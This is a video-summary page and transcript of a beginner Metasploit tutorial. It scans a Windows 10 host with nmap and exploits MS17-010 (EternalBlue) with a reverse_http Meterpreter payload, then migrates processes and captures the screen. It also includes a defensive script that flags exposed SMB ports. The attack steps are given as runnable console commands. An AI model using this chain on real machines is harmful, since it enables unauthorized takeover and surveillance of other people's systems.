Metasploit For Beginners - How To Scan And Pwn A Computer | Learn From A Pro Hacker

Loi Liang Yang
15 Apr 2021 | 10:02

Summary

TL;DR: This episode of 'Hub Hack' demonstrates how to identify vulnerabilities in computer systems that allow unauthorized access. The tutorial covers using nmap to scan for open services, Metasploit for finding exploits, and exploiting SMB vulnerabilities such as 'EternalBlue' (MS17-010) to gain control of a Windows system. It concludes with a warning about the importance of securing exposed services to prevent such breaches, encouraging viewers to stay vigilant about cybersecurity.

Takeaways

  • The video is an educational tutorial on hacking techniques to find vulnerabilities in computer systems.
  • It teaches how to use nmap to scan a computer system for running services and look for vulnerabilities.
  • The presenter demonstrates the process on a Windows 10 computer by checking the IP address with 'ipconfig'.
  • The tutorial covers how to use nmap to identify open ports and services, such as SMB, which can be exploited.
  • It explains the importance of identifying the version of services to find specific exploits.
  • Metasploit is introduced as the exploitation framework used to check for vulnerabilities and launch attacks.
  • The video shows how to search for SMB-related modules in Metasploit to find potential exploits.
  • The use of an 'auxiliary scanner' module in Metasploit is demonstrated to check whether the system is vulnerable to SMB attacks.
  • The script references the infamous 'EternalBlue' exploit, associated with the WannaCry ransomware attack.
  • The tutorial guides through setting up an exploit in Metasploit, including setting the target IP and payload.
  • After gaining access, the video shows how to migrate the shell to a different process to capture the screen of the compromised system.
  • The presenter emphasizes the importance of being cautious about the services running on one's computer system.

Q & A

  • What is the main topic of the video script?

    -The main topic of the video script is finding vulnerabilities in computer systems to gain unauthorized access and control over the entire system.

  • What tool is used to scan a computer system for services and vulnerabilities?

    -The tool used to scan a computer system for services and vulnerabilities is Nmap.

  • What is the purpose of the 'nmap -sV' command?

    -The 'nmap -sV' command is used to determine the version of the services running on the open ports of a scanned host.

  • What is SMB and why is it significant in the context of the video?

    -SMB stands for Server Message Block, a protocol that allows file and printer sharing across computers. It is significant because the script discusses exploiting vulnerabilities in SMB services to gain access to a computer system.

  • What is Metasploit and how does it relate to the video script?

    -Metasploit is an exploitation framework used to identify, exploit, and validate vulnerabilities. In the video script, it is used to check if the computer system is vulnerable to certain types of attacks.

  • What is the 'MS17-010' vulnerability mentioned in the script?

    -The 'MS17-010' vulnerability, also known as 'EternalBlue', is a critical SMB vulnerability that was exploited in widespread ransomware attacks. It allows remote code execution on affected systems.

  • What does the script suggest doing after finding the version of services with Nmap?

    -After finding the version of services with Nmap, the script suggests using Metasploit to check if the computer system is vulnerable to attacks specific to those service versions.

  • What payload is used in the script to exploit the 'MS17-010' vulnerability?

    -The script uses 'windows/meterpreter/reverse_http' as the payload to exploit the 'MS17-010' vulnerability.

  • What action is taken after a successful exploitation to gain control of the computer system?

    -After a successful exploitation, the script demonstrates migrating the shell to a different process and taking a screen capture of the entire computer system to show that full control has been achieved.

  • What is the final message of the video script regarding computer security?

    -The final message of the video script is a warning to be careful about the services running on computer systems, emphasizing the importance of cybersecurity.

Outlines

00:00

Introduction to Hacking Techniques

This paragraph introduces a tutorial on hacking, specifically how to find vulnerabilities in computer systems to gain unauthorized access. The host demonstrates the use of nmap to scan for open services on a target computer and discusses the importance of identifying weaknesses in these services. The tutorial aims to teach viewers how to find exploits and utilize them to access a computer system, starting with a practical example of scanning a Windows 10 computer for open ports and services.

05:01

πŸ” Scanning and Exploiting SMB Vulnerabilities

The second paragraph delves into the process of scanning for and exploiting SMB (Server Message Block) vulnerabilities, which are commonly found in Windows systems and can be used for file and printer sharing. The host explains how to use nmap to identify the version of SMB services running on a target machine and then introduces Metasploit, an exploitation framework, to search for and utilize SMB-related exploits. The paragraph covers the use of specific Metasploit modules to check for vulnerabilities, such as the infamous 'Eternal Blue' exploit, and demonstrates how to execute an attack to gain control over the target system. The host also shows how to migrate the shell to a different process for further actions, such as taking a screenshot of the target's desktop, emphasizing the seriousness of leaving services vulnerable to such attacks.
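A defender-side triage of the `nmap -Pn -sV` output the tutorial produces, as an added example (not code from the video or its author): it parses the scan's port table and flags the SMB exposure that the MS17-010 scanner check depends on. The scan text, hostname and version banners below are constructed samples modelled on the ports the video finds.

```python
"""Flag network-exposed Windows services in `nmap -Pn -sV` normal output.

Added example for this page, not code from the video. SAMPLE_SCAN is a
constructed sample shaped like the tutorial's scan of 192.168.0.186 (ports
135, 139, 445, 2869, 3389); the hostname and banners are placeholders.
"""
import re
from dataclasses import dataclass

# Constructed sample: the shape of `nmap -Pn -sV 192.168.0.186` output.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.0.186
Host is up (0.00042s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows 10 Pro 19041 microsoft-ds (workgroup: WORKGROUP)
2869/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: DESKTOP-EXAMPLE; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# Listeners worth questioning when reachable from the LAN. 139/445 are the
# SMB ports the video singles out (MS17-010 is an SMB issue); the others are
# common Windows services that also widen the attack surface.
REVIEW_PORTS = {
    139: "NetBIOS session service (SMB over NetBIOS)",
    445: "SMB direct (microsoft-ds)",
    135: "MSRPC endpoint mapper",
    3389: "Remote Desktop (RDP)",
}

# One nmap port-table row: "445/tcp  open  microsoft-ds  <version banner>"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


@dataclass
class OpenPort:
    port: int
    proto: str
    service: str
    version: str


def parse_nmap(text: str) -> list[OpenPort]:
    """Return the open ports from nmap normal output; other lines are ignored."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m["state"] == "open":
            ports.append(OpenPort(int(m["port"]), m["proto"], m["service"],
                                  (m["version"] or "").strip()))
    return ports


def smb_exposed(ports: list[OpenPort]) -> bool:
    """True when either SMB port is reachable, the precondition for the
    MS17-010 check the video runs with Metasploit's smb_ms17_010 scanner."""
    return any(p.port in (139, 445) and p.proto == "tcp" for p in ports)


def triage(text: str) -> list[str]:
    """One finding per reviewable open port (in port order), plus an SMB note."""
    ports = parse_nmap(text)
    findings = []
    for p in sorted(ports, key=lambda p: p.port):
        if p.port in REVIEW_PORTS:
            findings.append(f"{p.port}/{p.proto} {p.service}: {REVIEW_PORTS[p.port]}"
                            f" - banner: {p.version or 'n/a'}")
    if smb_exposed(ports):
        findings.append("SMB reachable: confirm MS17-010 patch status and restrict "
                        "139/445 at the host firewall unless file sharing is required")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_SCAN):
        print(finding)
```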

Keywords

Hacking

Hacking refers to the unauthorized access or control over a computer system or network. In the context of the video, hacking is portrayed as the process of finding vulnerabilities in a computer system to gain access and control, which is the central theme of the tutorial.

Vulnerabilities

Vulnerabilities are weaknesses in a system that can be exploited by hackers to gain unauthorized access. The video discusses finding these vulnerabilities in services running on a computer system, which is a critical step in the hacking process.

Nmap

Nmap, or Network Mapper, is a security scanner used to discover hosts and services on a computer network, thus creating a 'map' of the network. In the video, Nmap is used to scan for open ports and services on a target computer, which helps identify potential vulnerabilities.

Services

In the context of computer networks, services refer to the specific processes or functions that a system provides, often over a network. The video script mentions scanning for services to find potential weaknesses and exploits, such as SMB (Server Message Block).

SMB (Server Message Block)

SMB is a network file sharing protocol that allows applications to read and write to files and to request services from server programs. The video explains that SMB is a common service on Windows computers and is associated with certain vulnerabilities that can be exploited.

Exploits

An exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability in order to cause unintended or undesired behavior in a computer system. The video discusses finding and utilizing exploits to gain access to a computer system.

Metasploit

Metasploit is an open-source penetration testing platform that helps find, verify, and validate vulnerabilities. The video script describes using Metasploit to search for and launch attacks against vulnerabilities in the target system.

Payload

In the context of hacking, a payload is the data or commands that are executed when an exploit is successful. The video script mentions setting a payload, such as 'windows/meterpreter/reverse_http', to establish a connection back to the attacker's system after a successful exploit.

MS17-010

MS17-010 refers to a specific vulnerability in the SMB protocol that was exploited by the WannaCry ransomware attack in 2017. The video script uses it as an example of a vulnerability that can be scanned for and exploited using Metasploit.

EternalBlue

EternalBlue is the name of a Windows exploit that was leaked by the Shadow Brokers, targeting the SMB protocol. The video script mentions using an exploit module named 'eternalblue' to demonstrate how to attack a vulnerable system.

Meterpreter

Meterpreter is a powerful payload type used in Metasploit that provides a feature-rich shell within the exploited system. The video script refers to using a Meterpreter payload to gain a reverse HTTP connection, allowing the attacker to interact with the compromised system.

Highlights

Introduction to finding system vulnerabilities for unauthorized access.

Teaching how to scan a computer system for running services and vulnerabilities.

Using nmap to scan a computer for available services and potential exploits.

Demonstration of nmap scanning on a Windows 10 computer.

Explanation of using nmap's -Pn option when a firewall blocks its host-discovery probes.

Identification of open ports and services such as SMB.

SMB (Server Message Block) explained for file and printer sharing.

Finding the version of services to identify specific vulnerabilities.

Launching Metasploit for further exploitation of the system.

Searching for SMB-related modules in Metasploit.

Utilizing auxiliary scanners to check for SMB vulnerabilities.

The significance of the SMB MS17-010 vulnerability in past ransomware attacks.

How to use Metasploit to check for specific SMB vulnerabilities.

Selecting and configuring an exploit for the SMB MS17-010 vulnerability.

Executing the exploit to gain access to the target computer system.

Demonstration of migrating the shell to a different process for further actions.

Capturing and saving a screenshot of the target's desktop.

Emphasizing the importance of securing services running on computer systems.

Conclusion and call to action for feedback, likes, shares, and subscriptions.

Transcripts

00:00

Hi and welcome back to another episode on Hub Hack, and today I'll be teaching you about how you can find holes in a computer system that can give you access and take over the entire computer completely. Don't believe me? Let's go.

00:18

[Music]

00:24

So in the session today what we'll be learning is how we can scan a computer system for the different kinds of services they're running and look for vulnerabilities in those systems. So, looking for weaknesses in those services that can then give us access, to find exploits that are available, making sure that this computer system is susceptible to those attacks, which we can then utilize those exploits to give us access into the computer system. I will teach you about how you can do it quickly.

00:49

So right in front of us I have Kali Linux running, and I can go ahead and enter terminal. All right, so I can zoom a little more so it's easier for you to see. So the first thing we can do is to go ahead and use nmap to scan a specific computer, so that we can find those services available and then look for exploits that are in affiliation with those vulnerabilities, so that we can exploit it and give us access into the entire computer system.

01:12

So the first thing you can do: over here I have a Windows 10 computer running, and I can go ahead and enter ipconfig, and right here as I scroll up further I can see the IPv4 address. So in this case our target IP address is 192.168.0.186. So all I got to do right now is go under nmap and enter 192.168.0.186, hit enter on this, and we'll begin the scanning using nmap. So nmap is a network mapping service that can help us investigate and probe a computer to check for services, check for versions, check for different types of access that we can perhaps even try to gain access into.

01:50

All right, and the first thing you notice here is that the host seems down; if it is really up but blocking our ping probes, try -Pn. All right, so what is happening here is that there is a Windows Firewall that is running, right, which is the result of us being unable to complete a default scan. So all you're going to do now is enter -Pn (dash, capital P, n), hit enter on this, and we'll now begin, right, the scanning, and the address will be marked as up, and of course the scan time will take a little longer. And in this case we can identify the following: all right, we have 135 as a port number, we have 139 as netbios-ssn, 445, 2869, as well as 3389. All right, so we can see all these different kinds of services that are open up.

02:33

So what we can do next is to do an investigation about all the specific ports, and what I can tell you for sure is that because you are so familiar with the different types of services, because of your background in network administration and system administration, you know, all right, without even further checking, that 139 and 445 are actually services associated with SMB. Right, so what is SMB? SMB is Server Message Block, so it allows file sharing, literally file and printer sharing, that's being enabled on computers, and a lot of computers actually have, all right, SMB running, in Windows computers particularly. As a result there are protection weaknesses that you can try to exploit to gain access to it.

03:15

So what I can do next is to find out the version of those particular services, so you can enter -sV (dash, s, followed by a capital V), hit enter on this, and it will try to help us find out specific versions in association with those services that are open in a host. All right, so right here we can try to figure out what is going on in this particular computer. All right, so we have the following more detailed version of it, and we have the host name now, all right, and we have the Windows, we have the workgroup information and so on. So this gives us more precise feedback about the kind of services that are actually open up.

03:47

So what I can do next is to go ahead and start Metasploit, which is our exploitation framework that would give us access into the entire computer system. All right, so I'll go ahead and enter sudo msfconsole, hit enter on this, and I can enter my password. And once I load up my exploit framework we can then check the computer system to see if it's vulnerable to certain types of attacks. All right, so what I can do now is to go ahead and enter search and then I can enter smb. All right, so this is exactly what we're looking out for. So in this case we have a lot of different kinds of modules that we can run to check the computer system. All right, so we can scroll all the way up and look at all these different methods that we can utilize as part of the hack, and we can see over here we have exploits, we have auxiliary scanner and so on.

04:28

So what I can do next is to teach you about how you can actually search more precisely in Metasploit. So what we can do now is enter grep, followed by scanner, followed by search smb, hit enter on this, and it'll just show us all those results that only contain scanner. And in this case we can see auxiliary scanner, and what we're doing now is to check whether this particular system is vulnerable to SMB attacks. All right, so here we have smb ms17_010. Do you remember back in the days when there was a huge outbreak of ransomware attacks? So they were utilizing this specific, all right, scanning method as well as exploitation to gain access into the entire computer system.

05:07

All right, so right here what I can do next is go ahead, all right, and enter use auxiliary/scanner/smb/smb_ms17_010, hit enter on this, and enter show options. All right, so this will show us all the options that we have to key in as part of checking whether this specific computer can be vulnerable to this attack. So all I got to do now is enter set RHOSTS and the IP address that we're targeting, 192.168.0.186. So you may have your own IP address as part of the attack. So once you're done right here, all you got to do is to go and hit enter, run, hit enter on this, and it states the following scary stuff: host is likely vulnerable to MS17-010.

05:50

So I'm going to pause here for a moment. What we are trying to do right now so far is to scan the device for the services they're running and also to look out for potential vulnerabilities that are associated with those services in the computer, okay. And next is to find the exploit available so that we can gain direct access back to the computer, giving us full control of the entire computer system, okay.

06:10

So what I can do next is to go ahead, all right, and search for smb. Okay, so we have smb and we can look out for all those modules available with smb, and of course what we can do even better is to go ahead and enter grep, and now what we are trying to do is to look for exploits, so I grep exploit search smb, hit enter on this, and we have a number of exploits available for us to use and utilize as part of running the attack. All right, so all I can see here, scroll up all the way back to the top, right, so we have multi http, windows smb and so on, and what we are trying to find here is an exploit that can help us launch an attack directly against this service: exploit/windows/smb/ms17_010_eternalblue, all right, or you can also use exploit/windows/smb/ms17_010_psexec. So I'll go ahead and select this. All right, enter use followed by exploit, paste selection, hit enter on this.

07:06

Okay, and we can enter show options, and right here we have a number of options that we need to key in. So the main option is RHOST, so go ahead and enter the IP address, so this is the target machine that we're going after. So enter set RHOST 192.168.0.186, hit enter on this. So we have set the RHOST right now, and all we got to do right now is to go ahead and set a particular payload. All right, so we can enter set payload, you can double tap on this and it will show you all the available payloads that you can utilize as part of running the attack. Okay, so in this case what I can do is enter set payload and we can use, say for example, windows/ and double tap on it and look at all the other possibilities that we can utilize, okay. So in this case we have meterpreter, all right, so let's try to use meterpreter for this case, right, so we can use windows/meterpreter, double tap on it and see what else we got, and we can now use for example reverse_http. Hit enter on this, enter show options, and now we're going to set the LHOST, and LHOST has already been set for us, so that's great, fantastic, a lot of automation on it.

08:07

So all I got to do now is enter exploit, and let's see what happens. Hit exploit on this and we can see, right here, right now we have the meterpreter session one open, which means we are literally in, we have hacked into the computer system and we are now in full control of the entire computer. I can enter sysinfo, hit enter on this, and we can see the system information inside the computer right now. I can enter help and this will show us all the commands and instructions that we can send directly into the Windows computer.

08:34

So what's next is I can migrate this shell that we've got, this meterpreter shell that we've gotten, into a different process, which will then allow us to take a screen capture of the entire computer system. So all I'm gonna do now is enter, for example, okay, ps, to see the list of all the services inside the computer system, all right, and this will show us all the processes that are running, and I can enter migrate and we can migrate to, say, 4020, which is OneDrive.exe. Okay, so I go ahead and hit enter on this because it is currently running as a user, which is Loi Liang Yang, so again I'm hacking myself, so don't worry, I will not be hacking you. Go ahead and hit enter on this and now we're migrating the process over.

09:12

And right here, okay, once we've completed the migration, I can enter, all right, the following: I can enter screenshot, hit enter on this, and we will save a copy of the entire desktop screen to the following. All right, so I can go ahead and open up this file, right, so I click on the top left corner, I open the folder, all right, and right here I can see the file has been saved, and I can double click on it, on the following. All right, we got this particular file that's been saved, double clicked on it, and right here we can see we're in. We have full control of the entire computer system. Isn't that scary?

09:44

So you got to be really careful about what kind of services you have running inside all your computer systems. So once again I hope you learned something valuable in today's tutorial. If you have any questions please leave a comment below and I'll try my best to answer any of your questions. Remember, like, share and subscribe to the channel so that you can be abreast of the latest cybersecurity tutorials. Thank you so much once again for watching.
